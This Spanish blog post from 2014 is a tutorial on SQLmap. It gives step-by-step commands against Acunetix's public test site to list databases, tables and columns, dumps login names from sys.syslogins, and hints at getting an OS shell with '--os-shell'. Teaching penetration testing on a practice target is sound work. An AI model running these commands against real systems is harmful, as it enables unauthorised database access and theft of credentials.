domingo, 27 de abril de 2014

SQLmap - Herramienta para explotar vulnerabilidades SQLInjection




SQLmap es una herramienta de pruebas de penetración de código abierto, que automatiza el proceso de detectar y explotar los errores de inyección SQL.

Esta herramienta realiza peticiones a los parámetros de una URL que se le indique, ya sea mediante una petición GET, POST, en las cookies, etc. Es capaz de explotar todo tipo de inyeccion sql.

La herramienta dispone de un wizard para ayudar a los principiantes, aunque recomiendo que no se utilice para acostumbrarse a todas sus funciones, así sabremos bien lo que hacemos en cada momento.

SQLmap es una herramienta que está escrita en python y se puede descargar desde su página oficial:



PoC
 
Para la prueba de concepto vamos a utilizar una web de Acunetix destinada a pruebas online, así vosotros mismos podréis seguir los ejemplos mientras leéis.

La url es la siguiente: http://testasp.vulnweb.com/showthread.asp?id=1

Para ver las opciones de las que disponemos con esta tool ejecutaremos el siguiente comando:
python sqlmap.py -h




Como podéis ver tiene bastantes opciones...

Bien, vamos a realizar una prueba con la web que os comentaba.

python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 --dbs

  • -v 2: Elegimos el nivel 2 en Verbose, es decir, cuán detallado queremos que sea.
  • --url: Escribimos el Target.
  • --dbs: Indicamos que nos muestre las bases de datos.




Ahí las tenemos!!! ahora con el parámetro "--tables", le indicaremos que nos muestre las tablas de la base de datos que seleccionemos con el parámetro "-D database".

python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master --tables


Perfecto, ahora nos toca enumerar las columnas de la tabla que seleccionemos.
 
python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master -T sys.syslogins --columns password --dump


Por último, queda por volcar los datos de la siguiente manera.

python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master -T sys.syslogins -C loginname --dump



 Listo!!! ya tenemos los datos que buscabamos, ahora podríais intentar conseguir una shell mediante el parámetro "--os-shell", pero os dejo que os divirtáis investigando por vuestra cuenta xD

Os dejo con un video sobre SQLmap.


Saludos.





Referencias:
http://sqlmap.org/
https://www.owasp.org/index.php/Automated_Audit_using_SQLMap
http://highsec.es/2013/08/sqlmap-explotando-una-sql-injection/



**No me hago responsable del mal uso que se de a la información presentada. Esta información es de carácter didáctico.**

No hay comentarios:

Publicar un comentario